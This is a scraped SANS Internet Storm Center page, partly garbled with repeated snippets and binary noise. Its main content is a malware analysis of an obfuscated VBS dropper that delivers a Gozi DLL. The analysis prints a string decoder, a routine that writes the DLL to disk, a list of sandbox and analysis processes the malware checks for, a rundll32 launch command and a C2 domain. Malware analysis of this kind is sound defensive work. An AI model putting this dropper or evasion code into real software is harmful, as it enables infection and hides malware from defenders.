Are you over 18 and want to see adult content?
More Annotations
Quick Mobile Fix - Mobile Phone Repairs & Refurbished Phones
Are you over 18 and want to see adult content?
Nuts and Bolts Media - WordPress and Genesis Development Services
Are you over 18 and want to see adult content?
Domeinnamen en webhosting voor de zakelijke professional | VDX
Are you over 18 and want to see adult content?
Otobüs Bileti Fiyatları ve Ucuz Uçak Bileti Al - Biletall.com
Are you over 18 and want to see adult content?
finews.com: Latest Headlines, Breaking News and Top Stories
Are you over 18 and want to see adult content?
Online Marketing Strategies - Money Journal
Are you over 18 and want to see adult content?
Favourite Annotations
A complete backup of onthinktanks.org
Are you over 18 and want to see adult content?
A complete backup of aandewatches.com
Are you over 18 and want to see adult content?
A complete backup of seisukeknife.com
Are you over 18 and want to see adult content?
A complete backup of easyclocking.net
Are you over 18 and want to see adult content?
A complete backup of astrosanhita.com
Are you over 18 and want to see adult content?
A complete backup of taxfree.livejournal.com
Are you over 18 and want to see adult content?
A complete backup of blancalilianavellojinvega.com
Are you over 18 and want to see adult content?
A complete backup of pontodonegocio.com.br
Are you over 18 and want to see adult content?
A complete backup of getvisanowblog.wordpress.com
Are you over 18 and want to see adult content?
Text
tcpdump
ISC.INCIDENTS.ORG
Questions? Feedback? Use our contact form or report bugs here For interactive help and to chat with other users, try our Slack group. SECURING ALL THE THINGS: CIS BENCHMARKS FOR THE WIN! Using Benchmarks in Real Life •These documents are written with the goal of scripting and automation •CIS creates scripts in OVAL, these are used directly in CIS-CAT DSHIELD FRAMEWORK FIREWALL LOG CONVERSION CLIENT Send any questions to info@dshield.org. This script reads the log that your firewall produces and converts it to DShield format and emails it into DShield. CONFIGURE IT FIRST UDP HEADER TCPDUMP USAGE SOURCE PORT DESTINATION PORT UDP Header 0 1 2 3 0 Source Port Destination Port 4 Length Checksum - Common UDP Ports 7 echo 137 netbios-ns 546 DHCPv6c 19 chargen 138netbios 547 DHCPv6s
WWW.INCIDENTS.ORG
www.incidents.org
POWERPOINT PRESENTATIONWEB VIEW Who/What is Affected? Citrix ADC / Gateway 13.0. Citrix ADC / NetScaler Gateway 12.1 / 12.0 / 11.1. Citrix Netscaler ADC / NetScalerGateway 10.5
ISC.INCIDENTS.ORG
isc.incidents.org
SANS INTERNET STORM CENTER You can see that the Google Script expects two parameters: 'se' and 'ip'. The IP is the public IP address of the victim (collected by visiting api.ipify.org). When the script is called, it returns a chunk of Base64 data decoded and interpreted by PowerShell. It's a simple backdoor that communicates with the C2 hosted on scripts.google.com. SANS DAILY NETWORK SECURITY PODCAST (STORMCAST) FOR FRIDAY SANS ISC: SANS Daily Network Security Podcast (Stormcast) for Friday, May 21st, 2021 . SANS Site Network. Current Site; SANS Internet Storm Center Other SANS Sites Help Graduate Degree Programs IPV6 TCP/IP AND TCPDUMP IPv6 TCP/IP and tcpdump POCKET REFERENCE GUIDE incidents@sans.org • +1 317.580.9756 • http://www.sans.org • http://www.incidents.orgtcpdump
ISC.INCIDENTS.ORG
Questions? Feedback? Use our contact form or report bugs here For interactive help and to chat with other users, try our Slack group. SECURING ALL THE THINGS: CIS BENCHMARKS FOR THE WIN! Using Benchmarks in Real Life •These documents are written with the goal of scripting and automation •CIS creates scripts in OVAL, these are used directly in CIS-CAT DSHIELD FRAMEWORK FIREWALL LOG CONVERSION CLIENT Send any questions to info@dshield.org. This script reads the log that your firewall produces and converts it to DShield format and emails it into DShield. CONFIGURE IT FIRST UDP HEADER TCPDUMP USAGE SOURCE PORT DESTINATION PORT UDP Header 0 1 2 3 0 Source Port Destination Port 4 Length Checksum - Common UDP Ports 7 echo 137 netbios-ns 546 DHCPv6c 19 chargen 138netbios 547 DHCPv6s
WWW.INCIDENTS.ORG
www.incidents.org
POWERPOINT PRESENTATIONWEB VIEW Who/What is Affected? Citrix ADC / Gateway 13.0. Citrix ADC / NetScaler Gateway 12.1 / 12.0 / 11.1. Citrix Netscaler ADC / NetScalerGateway 10.5
ISC.INCIDENTS.ORG
isc.incidents.org
IPV6 TCP/IP AND TCPDUMP IPv6 TCP/IP and tcpdump POCKET REFERENCE GUIDE incidents@sans.org • +1 317.580.9756 • http://www.sans.org • http://www.incidents.orgtcpdump
SANS DAILY NETWORK SECURITY PODCAST (STORMCAST) FOR FRIDAY SANS ISC: SANS Daily Network Security Podcast (Stormcast) for Friday, June 4th, 2021 . SANS Site Network. Current Site; SANS Internet Storm Center Other SANS Sites Help Graduate Degree ProgramsWWW.INCIDENTS.ORG
www.incidents.org
INCIDENTS.ORG
incidents.org
D-LINK KIWI SYSLOG SETUP FOR D-SHIELD Kiwi Syslog Daemon with D-Link DI-804V Router . Your router must be installed and working. Go into the configuration panel ( http://192.168.0.1 ) and click on the DSHIELD FRAMEWORK FIREWALL LOG CONVERSION CLIENT Send any questions to info@dshield.org. This script reads the log that your firewall produces and converts it to DShield format and emails it into DShield. CONFIGURE IT FIRSTISC.INCIDENTS.ORG
isc.incidents.org
WWW.INCIDENTS.ORG
GI g {z Nr z F; t y ;tG p FO }ʼ 2 ,"/ ' # t > Y 'e ~ dE_ 2 N 9h w ~ l ] h n i C ~ h > T k tE eR ERF h n i C ~ h > T k tE eR ERF [ D > p Й a1Ï d S O J& w \l ӏ Ο /O ܗ T : ;h˿; 0/ l : b C2 d ( H ͒TO (Z *f^ ZyY +THjC qCyq | wv N 3 , 0 0 P yR( { + BM b B = :W3 ^ Jj h/ 0S ( ~б 7T u洨i zޘ ԋ } ۶ | GC ݵ 6 _R j o ߟ d > ȷ SANS INTERNET STORM CENTER You can see that the Google Script expects two parameters: 'se' and 'ip'. The IP is the public IP address of the victim (collected by visiting api.ipify.org). When the script is called, it returns a chunk of Base64 data decoded and interpreted by PowerShell. It's a simple backdoor that communicates with the C2 hosted on scripts.google.com. SANS DAILY NETWORK SECURITY PODCAST (STORMCAST) FOR FRIDAY SANS ISC: SANS Daily Network Security Podcast (Stormcast) for Friday, June 4th, 2021 . SANS Site Network. Current Site; SANS Internet Storm Center Other SANS Sites Help Graduate Degree Programs SANS DAILY NETWORK SECURITY PODCAST (STORMCAST) FOR SANS ISC: SANS Daily Network Security Podcast (Stormcast) for Thursday, May 20th, 2021 . SANS Site Network. Current Site; SANS Internet Storm CenterINCIDENTS.ORG
incidents.org
WWW.INCIDENTS.ORG
www.incidents.org
SECURING ALL THE THINGS: CIS BENCHMARKS FOR THE WIN! Using Benchmarks in Real Life •These documents are written with the goal of scripting and automation •CIS creates scripts in OVAL, these are used directly in CIS-CAT D-LINK KIWI SYSLOG SETUP FOR D-SHIELD Kiwi Syslog Daemon with D-Link DI-804V Router . Your router must be installed and working. Go into the configuration panel ( http://192.168.0.1 ) and click on the POWERPOINT PRESENTATIONWEB VIEW Who/What is Affected? Citrix ADC / Gateway 13.0. Citrix ADC / NetScaler Gateway 12.1 / 12.0 / 11.1. Citrix Netscaler ADC / NetScalerGateway 10.5
ISC.INCIDENTS.ORG
isc.incidents.org
SANS INTERNET STORMCENTER DAILY NETWORK/CYBER SECURITY AND A brief daily summary of what is important in information security. The podcast is published every weekday and designed to get you ready for the day with a brief, usually 5 minute long, summary of current network security related events. SANS INTERNET STORM CENTER You can see that the Google Script expects two parameters: 'se' and 'ip'. The IP is the public IP address of the victim (collected by visiting api.ipify.org). When the script is called, it returns a chunk of Base64 data decoded and interpreted by PowerShell. It's a simple backdoor that communicates with the C2 hosted on scripts.google.com. SANS DAILY NETWORK SECURITY PODCAST (STORMCAST) FOR FRIDAY SANS ISC: SANS Daily Network Security Podcast (Stormcast) for Friday, June 4th, 2021 . SANS Site Network. Current Site; SANS Internet Storm Center Other SANS Sites Help Graduate Degree Programs SANS DAILY NETWORK SECURITY PODCAST (STORMCAST) FOR SANS ISC: SANS Daily Network Security Podcast (Stormcast) for Thursday, May 20th, 2021 . SANS Site Network. Current Site; SANS Internet Storm CenterINCIDENTS.ORG
incidents.org
WWW.INCIDENTS.ORG
www.incidents.org
SECURING ALL THE THINGS: CIS BENCHMARKS FOR THE WIN! Using Benchmarks in Real Life •These documents are written with the goal of scripting and automation •CIS creates scripts in OVAL, these are used directly in CIS-CAT D-LINK KIWI SYSLOG SETUP FOR D-SHIELD Kiwi Syslog Daemon with D-Link DI-804V Router . Your router must be installed and working. Go into the configuration panel ( http://192.168.0.1 ) and click on the POWERPOINT PRESENTATIONWEB VIEW Who/What is Affected? Citrix ADC / Gateway 13.0. Citrix ADC / NetScaler Gateway 12.1 / 12.0 / 11.1. Citrix Netscaler ADC / NetScalerGateway 10.5
ISC.INCIDENTS.ORG
isc.incidents.org
SANS INTERNET STORMCENTER DAILY NETWORK/CYBER SECURITY AND A brief daily summary of what is important in information security. The podcast is published every weekday and designed to get you ready for the day with a brief, usually 5 minute long, summary of current network security related events. SANS INTERNET STORM CENTER You can see that the Google Script expects two parameters: 'se' and 'ip'. The IP is the public IP address of the victim (collected by visiting api.ipify.org). When the script is called, it returns a chunk of Base64 data decoded and interpreted by PowerShell. It's a simple backdoor that communicates with the C2 hosted on scripts.google.com. SANS INTERNET STORM CENTER 45.146.165.72 89.248.165.202 recyber.net 45.143.200.34 185.191.34.213 45.143.203.2 185.191.34.205 185.191.34.212 92.63.197.94 45.155.205.223 185.191.34.204 45.146.164 SANS INTERNET STORMCENTER DAILY NETWORK/CYBER SECURITY AND A brief daily summary of what is important in information security. The podcast is published every weekday and designed to get you ready for the day with a brief, usually 5 minute long, summary of current network security related events.INCIDENTS.ORG
146.88.240.4 www.arbor-observatory.com 194.165.16.27 141.98.81.154 45.146.164.211 5.188.62.240 89.248.165.202 recyber.net 193.27.228.64 185.191.34.207 45.155.205.165 SANS INTERNET STORM CENTER, INFOCON: GREEN Malware authors like to use a variety of techniques to avoid detection of their creations by anti-malware tools. As the old saying goes, necessity is the mother of invention and in the case of malware, it has lead its authors to devise some very interesting ways to hide from detection over the years – from encoding of executable files into valid bitmap images to multi-stage SANS INTERNET STORM CENTER You can see that the Google Script expects two parameters: 'se' and 'ip'. The IP is the public IP address of the victim (collected by visiting api.ipify.org). When the script is called, it returns a chunk of Base64 data decoded and interpreted by PowerShell. It's a simple backdoor that communicates with the C2 hosted on scripts.google.com. SANS DAILY NETWORK SECURITY PODCAST (STORMCAST) FOR FRIDAY SANS ISC: SANS Daily Network Security Podcast (Stormcast) for Friday, June 4th, 2021 . SANS Site Network. Current Site; SANS Internet Storm Center Other SANS Sites Help Graduate Degree Programs SANS DAILY NETWORK SECURITY PODCAST (STORMCAST) FOR SANS ISC: SANS Daily Network Security Podcast (Stormcast) for Thursday, May 20th, 2021 . SANS Site Network. Current Site; SANS Internet Storm CenterINCIDENTS.ORG
incidents.org
WWW.INCIDENTS.ORG
www.incidents.org
SECURING ALL THE THINGS: CIS BENCHMARKS FOR THE WIN! Using Benchmarks in Real Life •These documents are written with the goal of scripting and automation •CIS creates scripts in OVAL, these are used directly in CIS-CAT D-LINK KIWI SYSLOG SETUP FOR D-SHIELD Kiwi Syslog Daemon with D-Link DI-804V Router . Your router must be installed and working. Go into the configuration panel ( http://192.168.0.1 ) and click on the POWERPOINT PRESENTATIONWEB VIEW Who/What is Affected? Citrix ADC / Gateway 13.0. Citrix ADC / NetScaler Gateway 12.1 / 12.0 / 11.1. Citrix Netscaler ADC / NetScalerGateway 10.5
ISC.INCIDENTS.ORG
isc.incidents.org
SANS INTERNET STORMCENTER DAILY NETWORK/CYBER SECURITY AND A brief daily summary of what is important in information security. The podcast is published every weekday and designed to get you ready for the day with a brief, usually 5 minute long, summary of current network security related events. SANS INTERNET STORM CENTER You can see that the Google Script expects two parameters: 'se' and 'ip'. The IP is the public IP address of the victim (collected by visiting api.ipify.org). When the script is called, it returns a chunk of Base64 data decoded and interpreted by PowerShell. It's a simple backdoor that communicates with the C2 hosted on scripts.google.com. SANS DAILY NETWORK SECURITY PODCAST (STORMCAST) FOR FRIDAY SANS ISC: SANS Daily Network Security Podcast (Stormcast) for Friday, June 4th, 2021 . SANS Site Network. Current Site; SANS Internet Storm Center Other SANS Sites Help Graduate Degree Programs SANS DAILY NETWORK SECURITY PODCAST (STORMCAST) FOR SANS ISC: SANS Daily Network Security Podcast (Stormcast) for Thursday, May 20th, 2021 . SANS Site Network. Current Site; SANS Internet Storm CenterINCIDENTS.ORG
incidents.org
WWW.INCIDENTS.ORG
www.incidents.org
SECURING ALL THE THINGS: CIS BENCHMARKS FOR THE WIN! Using Benchmarks in Real Life •These documents are written with the goal of scripting and automation •CIS creates scripts in OVAL, these are used directly in CIS-CAT D-LINK KIWI SYSLOG SETUP FOR D-SHIELD Kiwi Syslog Daemon with D-Link DI-804V Router . Your router must be installed and working. Go into the configuration panel ( http://192.168.0.1 ) and click on the POWERPOINT PRESENTATIONWEB VIEW Who/What is Affected? Citrix ADC / Gateway 13.0. Citrix ADC / NetScaler Gateway 12.1 / 12.0 / 11.1. Citrix Netscaler ADC / NetScalerGateway 10.5
ISC.INCIDENTS.ORG
isc.incidents.org
SANS INTERNET STORMCENTER DAILY NETWORK/CYBER SECURITY AND A brief daily summary of what is important in information security. The podcast is published every weekday and designed to get you ready for the day with a brief, usually 5 minute long, summary of current network security related events. SANS INTERNET STORM CENTER You can see that the Google Script expects two parameters: 'se' and 'ip'. The IP is the public IP address of the victim (collected by visiting api.ipify.org). When the script is called, it returns a chunk of Base64 data decoded and interpreted by PowerShell. It's a simple backdoor that communicates with the C2 hosted on scripts.google.com. SANS INTERNET STORM CENTER 45.146.165.72 89.248.165.202 recyber.net 45.143.200.34 185.191.34.213 45.143.203.2 185.191.34.205 185.191.34.212 92.63.197.94 45.155.205.223 185.191.34.204 45.146.164 SANS INTERNET STORMCENTER DAILY NETWORK/CYBER SECURITY AND A brief daily summary of what is important in information security. The podcast is published every weekday and designed to get you ready for the day with a brief, usually 5 minute long, summary of current network security related events.INCIDENTS.ORG
146.88.240.4 www.arbor-observatory.com 194.165.16.27 141.98.81.154 45.146.164.211 5.188.62.240 89.248.165.202 recyber.net 193.27.228.64 185.191.34.207 45.155.205.165 SANS INTERNET STORM CENTER, INFOCON: GREEN Malware authors like to use a variety of techniques to avoid detection of their creations by anti-malware tools. As the old saying goes, necessity is the mother of invention and in the case of malware, it has lead its authors to devise some very interesting ways to hide from detection over the years – from encoding of executable files into valid bitmap images to multi-stage Threat Level: green Handler on Duty: Jim Clausing SANS ISC: SANS Internet Storm Center* SANS Site Network
* Current Site
* SANS Internet Storm Center * Other SANS Sites Help * Graduate Degree Programs* Security Training
* Security Certification * Security Awareness Training * Penetration Testing * Industrial Control Systems * Cyber Defense Foundations* DFIR
* Software Security
* Government OnSite Training SANS Internet Storm Center Sign Up for Free! Forgot Password? Log In or Sign Up for Free ! Last Daily Podcast (Fri, Jun 4th):Zoom CIS Benchmark @boeke; BIG-IP Vuln; WE.LOCK Vuln; 2xWordpress Plugin Vuln;LATEST DIARIES
STRANGE GOINGS ON WITH PORT 37*
*
*
PUBLISHED: 2021-06-03 LAST UPDATED: 2021-06-05 02:45:21 UTC BY Jim Clausing (Version: 1)0 comment(s)
Similar to Yee Ching's diary on Thursday, I noticed an oddity in the Dshield data last weekend (which I had hoped to discuss in a diary on Wednesday, but life got in the way) and thought it was worth asking around to see if anyone knows what is going on. As soon as I saw it, I reconfigured my honeypots to try to capture the traffic, but wasn't able to. I'm always very interested when I see some of the legacy ports and protocols pop up. In this case, port 37 is the time protocol which operates on both TCP and UDP and is one of the many services that frequently ran on the low ports of Unix machines I administered back in the 1980s and 1990s. In recent years, most operating systems have disabled these services since they only seemed to be used for DDoS purposes. On Thursday, I took another look at thegraph.
By default, we normally only show the Targets/Day and Sources/Day, but I've added in the Reports/Day and TCP Ratio for this analysis. The first thing that I noticed was the huge spike in reports. Our baseline was in the 200-500 reports/day range, but on 26 May, this jumped to around 46,000. So someone, was very actively looking, the other oddity to me was, that prior to the spike, nearly all of the probes were TCP, but from 25 May - 2 Jun, nearly all the attack traffic was UDP (the gold line on the graph above, ranges from 0 = all UDP to 100 = all TCP), which then seemed to disappear and return to the mostly TCP probes on 3 Jun when I took this snapshot. Since I was unable to capture any of the packets, I don't know if there was some strange data there that might have shed some light on the purpose of this activity. The total number of sources was still pretty small ranging from a low of 69 on 25 May to 176 on 2 Jun. Meanwhile the number of targets ranged from 156 on 25 May to almost 700 on 27 May, which is right in the range of targets we've seen for the past 10 months (there was a flurry of activity on the port last June and July that spiked regularly around 2400-2500 targets, not shown in the graph above). So, I'm not sure what to make of it, especially without any packets. If any of you managed to capture any of this traffic last weekend and early this past week and care to share, we'd love to have a look. Otherwise, if you have any insight into what was going on, please share below or via our contact form . I'm always very curious about these traffic oddities.---------------
Jim Clausing, GIAC GSE #26 jclausing --at-- isc sans (dot) edu Keywords: udp port 37 0 comment(s) Join us at SANS! Attend Reverse-Engineering Malware: Malware Analysis Tools and Techniques with Jim Clausing in Online | US Central startingAug 16 2021
RUSSIAN
DOLLS VBS OBFUSCATION*
*
*
PUBLISHED: 2021-06-04 LAST UPDATED: 2021-06-04 05:01:36 UTC BY Xavier Mertens (Version: 1)0 comment(s)
We received an interesting sample from one of our readers (thanks Henry!) and we like this. If you find something interesting, we are always looking for fresh meat! Henry's sample was delivered in a password-protected ZIP archive and the file was a VBS script called "presentation_37142.vbs" (SHA256:2def8f350b1e7fc9a45669bc5f2c6e0679e901aac233eac63550268034942d9f). I uploaded a copy of the file on MalwareBazaar. When you open it, you spot immediately the first obfuscation technique used: characters encoding but also a lot of junk comments (to make readability more difficult). So, first, let's get rid of the comments (there are present in both formats: "REM" or a single quote) root@remnux:/MalwareZoo/20210603# egrep -v "^(REM|')" presentation_37142.vbs >presentation_37142.vbs.nocomments When you have a look at the cleaned file, you see some calls to execute the result of a function limpet(): Indeed, below in the code, we find the function: Function limpet(hmx)chivalrous=1:pbI=9
KONQLa = lbound(hmx) OOSUF = ubound(hmx) for judicious = KONQL to OOSUFRandomize
if hmx(judicious) = 999999 Then Talmud = Talmud & ChrW(Int((chivalrous-pbI+1)*Rnd+pbI))Else
Talmud = Talmud & ChrW(hmx(judicious) - (((5965 - (12 - 6.0)) - 292.0) - 5660.0))End if
Next
limpet = Talmud
End Function
It's used to decode arrays of integers that we find in the file. We can try to replace all the execute()calls with Wscript.Echo() andexecute the file:
We decoded more pieces of the script but we see that it fails on the line "ELvv". We can see a bunch of strings at the end of the script:ELvv
QSV
Zme
numb
TdJb
RGOD
bRDW
tawny
baronial
PRJh
ERa
Those functions are created when the strings are deobfuscated by limpet() and executed. Here is an example:Function ELvv()
GewqX("DEBUG: FS_FCH - Start") on error resume nextDim chivalrous,pbI
chivalrous=5000
pbI=2000
Randomize
WScript.Sleep Int((chivalrous-pbI+1)*Rnd+pbI) Set setupService = GetObject("winmgmts:\\.\root\cimv2") Set judiciouslItems = setupService.ExecQuery("Select * from Win32_LogicalDisk") For Each inhwg In judiciouslItems Ppli = Ppli + Int(inhwg.Size / (39 + ((22 + (-17.0)) + (1073741782 - 2.0))))Next
If round(Ppli) < (((7 + 27.0) + (-19.0)) + (6208 - 6173.0)) Then GewqX("DEBUG: FS_FCH - False")Ldj
End If
GewqX("DEBUG: FS_FCH - True")End Function
Do you remember all the arrays of interegers in the original script? Not all of them were followed by an execute(). Because they are used in another array in a deobfuscated function:Function PRJh()
GewqX("DEBUG: F_DROPPED - Start") Dim osteopathic:Set osteopathic = CreateObject("ADO"+"DB.S"+"tr"+"eam")With osteopathic
.Type = 2
.Charset = "ISO-8859-1".Open()
For Each codeposit in Array(rUM, dPO, XRbN, yrs, niTC, zVpd, FwV, FCp, bQec, SRtOv, bASM, Nys, GuUuW, WeK, wpzJ, YHKZ, JnPu, oAS, oaC, zlwL, pKkq, NXmo, QTrX, Flut, nAkRy, HRQyY, zzTHn, Csg, omBk, xJrCx, IsEW, XYJUj, NeJ, PxnF, DXx, QvkW, DnNcg, RnDr, vHgx, Ynwg, wfG, aOaUo, HiKrS, xQB, bLErk, COtj, ATRrc, sxLK, Dyj, sDZ, BmUn, jLX, FgF, uhE, dBtN, gaVt, xBJ, PuiTq, btwV, avhtp, hNd, IZh, vJMC, Sqi, saJ, svVXu, qJI, SXft, KIpu, izb, yYY, MtIz, KdoAK, ALd, QJwqG, xisN, sexYP, irJ, NCI, SBma, AQpP, FOz, nVmL, RRB, JIBYA, WfhqI, aQQN, udc, Xvle, OFMs, awj, udzh, OwA, hkgk, SxR, thlD, UXOkn, LKR, TfsoC, wSCJ, cVANb, uZO, BAOxQ, uPPY, BfW, hle, rsdR, QoZkT, Tua, aFr, GCLj, HJy, EGFrK, ppp, ArQcy, LaK, ByYn, ZyPzH, onTV, gARY, HCXTl, ZVt, nKEv, PtaK, eti, hrKE, eXwev, ddDZ, xyN, zCGr, BpvU, lmO, QMl, iZA, bvLfp, GWOG, qWtY, oin, fUDXE, bMSg, uGYU, SMa, GSS, TURRX, vvGy, EiM, BzYH, opQ, OOH, mpKJ, HPnoY, TtJsn, Jdx, DaTI, gdf, xHl, mjF, YnD, KWsA, UrvS, RUkY, szER, tIGWz, UuOZ, kCg, BPiH, ZJS, Met, KVkoD, tdLQ, opJ, CxK, hDX, OqOhw, GJPId, QkuF, jEm, bMjTD, Wfm, qnv, iwX, bPdD, nbva, CcdOc, iEvqT, PTwoC, AjDE, NURs, CXQc, hkGY, QENnM, gIpa, bVf, nNh, CBrt, jiJE, Szoen, qRa, UmwG, dmPCT, xBTPw, mJzrP, hWgcR, kOgs, DINkp, blA, lalRK, UgQmB, gQgs, ZGLuf, GpTw, NKSF, GEya, Szw, sut, mee, MGuCv, pAhj, mhgP, lWqmb, pAD, Eiyd, dCn, DbcQR, rhscz, ARgF, wFpS, MGv, Aqtuc, gfqu, LqY, Iph, MxzQ, QUT, CLzUD, ShzgE, SCr, gSu, BgGX, fEyv, nzHHg, JAtaq, EtUo, tOR, BLo, nlKy, QIKP, QTPI, JorR, Mqo, Qyut, Ekfe, MhvQF, ZtRzU, LjOgB, VyK, Bluo, POGf, nmMl, OwLN, KHn, dbsnZ, qMMuW, DInM, MlbSL, HbS, SVr, Harw, Srd, cLL, EDW754, UajxU, uFp, vCgaf, OFg, JsVin, NIuAD, OVz, veT, EzdVL, DFZgp, WfrR, NCP, sZb, xaCQ, OvD, iXS, OLez, YaIjt, hLDNJ, DMhMf, oRpL, zaY, Cfu, jwt, wRux, WFR, xmAW, Jng, TxJ, YSB, tRDsh, lerhk, cHFw, TqDMb, VEt763, zvJ, zsz, qbO, tvqtX, JFWO, Yvz, lFsX, OtLxd, KiBDP, bfK, Hvp, Kjih, WUCEg, HdTbW, WZPn, lJiok, pAuh, MBqS, grwz, aPsWo, QGdkF, Zig, BvB, AeSnp, pnZl, LEsr, yFS, eJkhN, ozCs, sPP, DpyGu, dJv, ram, fzpK, XAfht, nXB, EoaJ, dhZeR, xwuE, uyB, afK, LVQk, Niqn, FxJFC, wfUhd, kdBo, eqj, CiF, DDMRO, OTj, xnZ842, ADSM, aEQ, hqB, lrBWH, RnGp, xSeG, EOZI, QmScs, VPcRZ, lZOaQ, kCQM, RKE, dMO, LKGwR, RkVx, bPxAv, mmnQO, wSoiq, Mzm, ZEYEP, yqcY, QwCor, XWazl, kYRx, toCiV, nhELZ, kcSLs, oTBxY, DgxmU, ibw, mpkq, aaTTR, LnjuS, wOH, AZL, MdUpB, WzA, yQbeO, cTz, HhpIT, hUDb, TJr, SYw, mTQ, Ncm, Qackb, DBOpx, zUt, jDFf, NQH, EPu, qDh, rWwx, ecbWb, nmVbz, BCH, JfEdB, upm, Aek, SXLUH, kim, XjXMj, OEcx, nJpLa, bqVTd, Tsg, MOA, dBci, YUM, eFa, wQN, TXDP, uHmt, rxW, EcOhJ, KcK, ZetI, RXEK, Imq, LFfk, aWTf, dJklK, DCY, DzPVT, WkK, lmeb, VXy, hmaUa, XsV, tlPuy, KCWj, weqD, gEd574, cRWmH, uyxS, HCm, XtMnx, lijm, uAT, gexWJ, ZQs, VvCEp, pgvCk, LsJh, ySkqT, Kzwtv, gTcM, bhLVG, bMtx, oBA, pCpHo, JhwuT, tmCJ, FlnBx, CWGT, Rzj, wQPJ, JLxr, ueiX, rdbX, DuxK, cszZ, Rbg, UeK, uYU, LeIZq, hBUp, vKTFA, MIY, zCD, XtGy, OLU, Umr, WBWsH, SIjEe, wblv, IXnk, ruRbR, aNW, nJdCW, XexJB, GbZ, Coz, gdp, qtjKq, iUFUB, NlaC, rLNFl, pleE, bma, iyDD, ElvJ, AkGP, Kmv, VQI, dgbHA, bAA, AgU, YTABm, gXjXx, DYm, dXuBM, tFLpx, BqiQ, FgOOF, dHJ, zTKGi, xitWR, htZix, pvn, MVI, gsN, Mpa, Czx, FZf, kyX, uNzIl, zhcBS, yOFY, fPn, qPPJ) .WriteText limpet(codeposit)Next
.Position = 0
.SaveToFile sandhill + "racial.drc", 2.Close
End With
GewqX("DEBUG: F_DROPPED - True")End Function
That's why I called it the "Russian Dolls" technique because we have arrays of data used by arrays of data etc... Let's execute the function PRJh() and dump the file on the disk:racial.drc
(SHA256:77E706F98B1E4FE48A4A1631B27529DC587AEAB2D187322439D3B5A726DA2F80). It's a DLL with only one export: DllRegisterServer. But first, let's check the other functions in the VBS script: * ELvv checks the available disk space * QSV checks the numbers of CPU (cores) * Zme checks the available memory * numb checks for interesting running processes * TdJb checks the uptime * RGOD check files in %TEMP% * baronial creates a file called "adobe.url" in %TEMP% which points to https://adobe.com (?) We have here classic sandbox/virtualization detection techniques. Here is the list of processed searched by numb: Brenner = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","winalysis.exe","emul.exe","malmon.exe","RepUtils32.exe","winapioverride32.exe","ethereal.exe","mbarun.exe","RepUx.exe","windbg.exe","ettercap.exe","mdpmon.exe","runsample.exe","windump.exe","fakehttpserver.exe","mmr.exe","samp1e.exe","winspy.exe","fakeserver.exe","mmr.exe","sample.exe","wireshark.exe","Fiddler.exe","multipot.exe","sandboxiecrypto.exe","XXX.exe","filemon.exe","netsniffer.exe","sandboxiedcomlaunch.exe") The function ERa runs the dumped DLL: avlt = "rundll32" + " " + sandhill + "racial.drc" + ",DllRegisterServer":setupService.create avlt This DLL is part of the Gozi malware family and communicates with a C2 server located atauthdferonokcom.
To conclude, the VBS script has some debugging code implemented via aspecific function:
GewqX("DEBUG: F_MESSAGE - Start") The function is simple: Function GewqX(victrola) If (InStr(WScript.ScriptName, cStr(82984)) > 0 And ucMHV = 0) ThenMsgBox(victrola)
End If
End Function
The debugging is enabled if the script filename contains the substring"82984".
https://bazaar.abuse.ch/sample/2def8f350b1e7fc9a45669bc5f2c6e0679e901aac233eac63550268034942d9f/ https://bazaar.abuse.ch/sample/77e706f98b1e4fe48a4a1631b27529dc587aeab2d187322439d3b5a726da2f80/ https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi Xavier Mertens (@xme) Senior ISC Handler - Freelance Cyber Security ConsultantPGP Key
Keywords: DLL Gozi MalwareObfuscation VBS
0 comment(s)
Join us at SANS! Attend Reverse-Engineering Malware: Malware Analysis Tools and Techniques with Xavier Mertens in Online | British Summer Time starting Aug 23 2021 If you have more information or corrections regarding our diary,please
share
.
Top of page
RECENT DIARIES
STRANGE GOINGS ON WITH PORT 37JUN 5TH 2021
1 DAY AGO _BY JIM_ (0 COMMENTS) DSHIELD DATA ANALYSIS: TAKING A LOOK AT PORT 45740 ACTIVITYJUN 3RD 2021
2 DAYS AGO _BY YEE CHING_ (0 COMMENTS) WIRESHARK 3.4.6 (AND 3.2.14) RELEASEDJUN 2ND 2021
3 DAYS AGO _BY JIM_ (0 COMMENTS) GUILDMA IS NOW USING FINGER AND SIGNED BINARY PROXY EXECUTION TOEVADE DEFENSES
JUN 1ST 2021
4 DAYS AGO _BY RENATO_ (0 COMMENTS) QUICK AND DIRTY PYTHON: NMAPMAY 31ST 2021
5 DAYS AGO _BY RICK_ (0 COMMENTS) VIDEO: COBALT STRIKE & DNS - PART 1MAY 30TH 2021
